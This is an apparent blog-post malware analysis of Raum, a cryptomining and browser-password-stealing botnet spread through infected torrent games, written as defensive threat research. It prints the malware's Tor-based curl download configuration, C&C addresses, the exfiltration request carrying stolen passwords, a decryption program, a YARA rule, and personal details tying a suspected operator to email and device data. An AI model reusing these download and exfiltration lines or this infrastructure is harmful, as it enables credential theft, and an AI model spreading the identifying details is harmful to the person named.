Der Dritte Raum, Die Forschung!

What do we know about RAUM?

This history starts like all good stories… One winter night, enjoying my glass of brandy and smoking my macerated oak pipe, near the warmth of the fireplace…

… while I am checking in my beautiful laptop some new samples from my usual dealers, as always the same shit, Zeus Like, Andromedas, and SpyEye… yep that’s correct SpyEyes… when something gets my attention, something that initially looked like just a crappy sample.

Well, this story would not make total sense if we didn’t jam along some related tunes… (: 3,2,1 Music!

A quick check reveals the earliest activity of this particular actor during the last quarter of 2015, although after some digging it seems that they have been at it since at least 2014 according to different indicators:

Virustotal Analysis

Thu Dec 11 2014 23:44:32   222720 m... -rw-r--r-- 772728590 1114402152 0        ./tools/f.setup_extract
                           218112 m... -rw-r--r-- 772728590 1114402152 0        ./tools/f.setup_extract.rep2
                          1244160 m... -rw-r--r-- 772728590 1114402152 0        ./tools/regwrite.raum_encrypted_2
                           223232 m... -rw-r--r-- 772728590 1114402152 0        ./tools/reserved.setup_extract
                           223232 m... -rw-r--r-- 772728590 1114402152 0        ./tools/reserved.setup_extract.rep2
Thu Dec 11 2014 23:44:33      136 m... drwxr-xr-x 772728590 1114402152 0        ./u
                           225792 m... -rw-r--r-- 772728590 1114402152 0        ./u/01.lalka.raum_encrypted
                           226304 m... -rw-r--r-- 772728590 1114402152 0        ./u/01_2.lalka.raum_encrypted
                           227328 m... -rw-r--r-- 772728590 1114402152 0        ./updates/01.lalka.raum_encrypted
                           227328 m... -rw-r--r-- 772728590 1114402152 0        ./updates/02.lalka.raum_encrypted
                          1319936 m... -rw-r--r-- 772728590 1114402152 0        ./updates/03.lalka.raum_encrypted
Thu Dec 11 2014 23:44:34  1315328 m... -rw-r--r-- 772728590 1114402152 0        ./updates/04.lalka.raum_encrypted
                          1148928 m... -rw-r--r-- 772728590 1114402152 0        ./updates/05.lalka.raum_encrypted

Fast forward to today… during the last few months, we have been following their activities and evolution. Although we were not alone. The Arbor guys sinkholed one of their domains. Unfortunately, this is not enough because the distribution model of Raum is based on a tor hidden service that is still active and their first stage comes as a surprise gift bundled with some PC games shared on torrent trackers.

Targets and Infections

First of all, we have to say that the main purpose of Raum is cryptocurrency mining. The actor figured that the best way to get computational power was by infecting gamers, as their flashy GPUs can be used for mining (completely free!). For this reason alone, it makes sense that Raum’s distribution model is based on… drumroll YOU GUESSED IT!: sharing infected PC games on different torrent sites. Check the trackers IOC’s for the lulz:

Malware Analysis

Static analysis

Raum’s first stage obtains information about disk drives, launches WSAStartup and verifies the path to the executable.

It verifies the installation of Raum in the system, if the malware is not correctly installed, it will call MlwInstallInPath, which is responsible for installing and creating persistence in the system. After installation, it uses CreateProcess to spawn a new process from the final installation path, exiting the current execution thread.

Let’s see something more about this feature

Raum attempts to create a Mutex with an .onion domain, if the operation is successful execution continues, otherwise it tries to create the Mutex again after a bit of sleep. If this one fails as well, the malware will call ExitProcess and stop its execution.

After Raum is installed, it calls DecompressInstall, responsible for downloading Tor, if Tor does not exist in the system, and will also decompress the files associated to that particular version of Raum.

This function can be divided in the following steps: 127 Verify the existence of the service TOR by the CheckTorService. In case it malware can not connect to the tor service, it will look for a resource -T in the binary, if this does not exist, Raum will download the resource from URL http: // whatami.us.to / tc through its DownloadLibTor function.

If the file download fails, Raum will go to sleep and attempt to repeat the whole process later… poor boy! (:

The downloaded file is a zip.

Downloaded files are:

The malware decompresses the file in Raum’s install path with the code loop shown in the image. These files are Raum’s settings, which define:

• The URL of the C&C
• The URL .onion for C&C
• Necessary libraries such as curl.

When everything is downloaded and unpacked to disk, Raum reads the connections file, where the settings for Tor reside.

<cfile>curl.exe</cfile>
<cargs>--socks5-hostname 127.0.0.1:9150 http://fofyxm5ifo5l6ttx.onion/signin/latest_build/ --output "</cargs>
<ccargs>--socks5-hostname 127.0.0.1:9150 http://fofyxm5ifo5l6ttx.onion/signin/latest_build_pre_reg/%s/%s/ --output "%s"</ccargs>
<pccargs>--socks5-hostname 127.0.0.1:9150 %s --output "%s"</pccargs>
<file>svchost.exe</file>
<args>--defaults-torrc "torrc-defaults" -f "torrc" DataDirectory "." --quiet</args>

This configuration is responsible for establishing Tor server options, using CreateProcess to launch the Tor service.

Once all of this is completed, Raum is fully operational and it is able to establish anonymized connections with the defined C&C infra. C&C addresses are hardcoded in csv format into Raum’s binary. A FILE WITHIN A FILE!

http://82.146.54.187/,http://riqclchjyebc43np.onion/

In these addresses, Raum will find the mining software as well as the config parameters to run them.

Raum will then call DownloadConfigAndUpdates to keep itself updated, and answer any queries launched by the C&C. This function generates the connection string to download configs and updates if necessary.

One interesting thing to note is that during this analysis, Raum only downloaded Bitcoin mining programs, although it could potentially download and run anything that was put on the software distribution servers.

http://82.146.54.187/3Ug6mll4M9u2kalAsPEf6B5oiijFa4F03Ug6mll4M9u2kalAsPEf6B5oiijFa4F0/0/1/0/0/15/0:0:0/3/

This connection string is unique for each client. Among the info submitted, the malware will report back if it’s a 32 or 64 bit system to influence what mining package will be downloaded.

This is the new configuration, downloaded in xml format.

<3Ug6m>
    <lm4lU>15</lm4lU>
    <l4mlg>http://82.146.54.187/bitfury_updates/nop_3.update.raum</l4mlg>
    <4llm6>666AnotherPassword666</4llm6>
    <Alak2>
        <sPEf6>null</sPEf6>
        <l4mlg>http://82.146.54.187/reborn_updates/95.raw</l4mlg>
    </Alak2>
</3Ug6m>
   <g63Ul>true</g63Ul>
   <6gU34>http://82.146.54.187/,http://82.146.54.187/</6gU34>
<mll43>60</mll43>

• This file contains the password to decompress Raum files: <4llm6>666AnotherPassword666</4llm6>
• Raum location in the remote server: <l4mlg>http://82.146.54.187/bitfury_updates/nop_3.update.raum</l4mlg>
• Raum updates: <l4mlg>http://82.146.54.187/reborn_updates/95.raw</l4mlg>

The following code can decrypt the Raum files:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>


int RecorreArray_401000(char *a1){
  char *i; // eax@1
  for (i = a1; *i; ++i )
    ;
  return i - a1;
}

/**/
FILE *DecodeFile_40152A(char *Filename, char  *a2)
{
  
  FILE *result; // eax@1
  unsigned int i; // [sp+4h] [bp-14h]@2
  unsigned int v4; // [sp+8h] [bp-10h]@2
  unsigned int Size; // [sp+Ch] [bp-Ch]@2
  void *DstBuf; // [sp+10h] [bp-8h]@2
  FILE *File,*dresult; // [sp+14h] [bp-4h]@2

  result = fopen(Filename, "rb");
  dresult = fopen("decrypt.raw","ab");
   result = fopen(Filename, "rb");
  dresult = fopen("decrypt.raw","ab");

  if ( result )
  {
    File = result;
    fseek(result, 0, 2);
    Size = ftell(File);
    fseek(File, 0, 0);
    DstBuf = malloc(Size);
    fread(DstBuf, 1u, Size, File);
    v4 = RecorreArray_401000((char *)a2);
    for ( i = 0; i < Size; ++i )
      *((char *)DstBuf + i) ^= *(char *)(i % v4 + a2);
    fseek(File, 0, 0);
    fwrite(DstBuf, 1u, Size, dresult);
    free(DstBuf);
    fclose(File);
    result = (FILE *)1;
  }
  return result;
}



int main(int arv, char *argv[]){        
        if(arv<2){
            printf("Usage: %s  File\n",argv[0]);
            exit(1);
        }else{
                char pass[]="666AnotherPassword666";
                printf("Pass: %s\tFile%s\n",pass,argv[1]);
                DecodeFile_40152A(argv[1],pass);
        }
}

The output of this part of the analysis was:

Lab@/tmp % ./dec nop_3.update.raum 
Pass: 666AnotherPassword666 Filenop_3.update.raum
Lab@/tmp % file decrypt.raw 
decrypt.raw: PE32 executable (GUI) Intel 80386, for MS Windows
Lab@/tmp % md5sum decrypt.raw 
6415883c571ab31e60a1a1fb1586b696  decrypt.raw

When downloads finish the new binaries are executed and the running Raum process stops its execution.

Raum Browser Stealer

Static Analysis

Interes-strings! (Yara rules in 3, 2, 1… GO!):

• 127.0.0.1:9150
• google.com
• fofyxm5ifo5l6ttx.onion
• ip-api.com
• whatami.us.to

Prologue

This module will execute a prologue that will be the same in successive executions:

It first calls WSAStartup, then generates a victim identifier string that will be used later on to name files and folders. This name is generated via GetVolumeInformationA. This prologue doesn’t use any external parameters. Then it will verify the instalation of TOR. In case a local installation does not exist or wasn’t completely installed, raum will download and reinstall its own version from whatami.us.to. Nothing new to write home about, other analysed versions/modules of Raum do this as well.

First exec

Get this, this is crackpipe stuff. During a first execution, the sample will launch itself five times with five different parameters.

This is the loop that does that, for each iteration putting the binary’s path in the stack and adding the string ;%C, representing the function to run, basically [0, 1, 2, 3 and u], after that, it calls CreateProcessA. After executing the binary with the 5 different args, it exits execution.

Raum ARG ‘;0’

This codepath creates a file in the Raum folder with the name obtained in the prolog execution followed by a 02, e.g. fbbdf902, if the file already existed it is overwriten, then it outputs the string {"passwords":[ to the file and ends execution.

Raum ARG ‘;1’

along this codepath, Raum tries to steal Opera browser data, contained in a SQLite db. The malware will copy the file %appdata%\Opera Software\Opera Stable\Login Data into its directory and renaming it as .backup

Performs some SQL queries and extracts urls with their associated usernames and passwords, and puts them in the file created during the execution of ARG ‘;0’. To verify this, we did create a gmx webmail account.

sure enough in the file we see added the following string: {"url":"https://service.gmx.es/registration.html","login":"pokoyo (along others stored passwords), which matches what we’ve seen in static analysis. Finally, it deletes the .backup file.

Raum ARG ‘;2’

Second verse, same as the first! This routine steals… chrome saved passwords, pretty much the same way it did with Opera.

Raum ARG ‘;3’

Now, for something refreshing, this code also steals saved passwords, this time yandex saved passwords.

Raum ARG ‘;u’

In this piece of code, Raum adds the default browser information to the created file and terminates the JSON string, resulting in something like this:

{"passwords":[{"url":"https://service.gmx.es/registration.html","login":"pokoyoyo2048","pass":"qwerty123456"}],"browser":"\"C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe\" -osint -url\"%1\""}

If the file is not too big, it sends it back to the CnC with the following format:

Request crafted with the following:

• domain (fofyxm5ifo5l6ttx.onion)
• uri (signin/password_gate/?id=)
• id (identifier string calculated in the prologue)

• variable p=, which contains the stolen data:

  p={"passwords":[{"url":"http://127.0.0.1:9988","login":"admin","pass":"admin"}],"browser":"\"C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe\" -osint -url \"%1\""}

Finally it encrypts the contents of the 02 file and outputs it to the file ending in 03.

The cipher used is… plain xor against a static 3 byte key \x6b\x65\x6b

Sure enough…

```»> a = ‘7b2270617373776f726473223a5b7b’ …

print a.decode(‘hex’) {“passwords”:[{ ```

Yara:

rule raum:Raumloader{
meta:
    author = "The Malware Hunter"
    date = "2016-09-21"
    description = "RaumLoader"
strings:
    $a = {E8 ?? ?? FF FF 6A 03 5E 56 E8 ?? ?? FE FF 8D 85 F0 F5 FF FF 50 E8 ?? ?? FE FF 59 59 88 1D B8 ?? 45 00 E8 ?? ?? FF FF 84 C0 75 05}
condition:
    1 of them
}

Raum update files:

C&C

Well, a picture is worth a thousand words… so here we go!

Some trackers

**

Actually they have 60688 torrents infected. Most of them are games although we have found that they were distributing other kind of software with the same surprise gift.

But apart from using your GPU to mine, Raum is able to steal passwords and steam accounts:

Find your password

Or your Steam account

Also the panel reports on information about the botnet:

Other goodies

During our analysis we found some other interesting things about how this actor is working.

Invitation

One of the features of the CnC is that you can register your own account if you have an invitation code that is always the same:

if($_POST['reg_login'] != '' && $_POST['reg_password'] != '' && $_POST['reg_invite'] == 'hfjugjguk')

Notifications

Some actions in Raum trigger a notification. This notification is sent two different ways:

• Email to push0x6a@gmail.com
• Using Pushbullet

Unfortunately we don’t have any clue about who is receiving these last ones… Baaahhh just joking:

 $ php showmeyourleg.php
 {"active":true,"iden":"ujAi3pzbtIq","created":1.441059640016788e+09,"modified":1.446606829421686e+09,"email":"joninoxvile9@gmail.com","email_normalized":"joninoxvile9@gmail.com","name":"jonie noxvil","image_url":"https://static.pushbullet.com/missing-image/ae6cac-4a","max_upload_size":26214400}
 {"accounts":[],"blocks":[],"channels":[],"chats":[],"clients":[],"contacts":[],"devices":[{"active":true,"iden":"ujAi3pzbtIqsjAiVsKnSTs","created":1.441059643240076e+09,"modified":1.441059643240082e+09,"type":"windows","kind":"windows","nickname":"HELLROOM-PC","manufacturer":"Microsoft","model":"Windows 8.1 Pro","app_version":368,"fingerprint":"{\"cpu\":\"Intel64 Family 6 Model 58 Stepping 9, GenuineIntel\",\"computer_name\":\"HELLROOM-PC\"}","pushable":true,"icon":"desktop"}],"grants":[],"pushes":[],"profiles":[],"subscriptions":[],"texts":[]}

Attribution

Our attribution dice says that this was a thing from China, but we didn’t really believe it. As usual, attribution is hard to prove although we have some information that points to one person. We have to say that during the first quarter of 2016, the botmaster cleaned up users, leaving just one admin (0xDa0). We got some information about the logins as well… and we saw a clear pattern of logins from the same IP since January.

Searching through the web, we found the user 0xDa0 on Stackoverflow linked with a different account from a Russian PHP developer. This could be just a coincidence but… after searching for this username in the Raum database, we found it! It smells like a botmaster infecting himself or just a coincidence. Anyway, we leave you with a nice graph with the information, in case you want to play detective.

See you on the next analysis!

The Malware Hunter!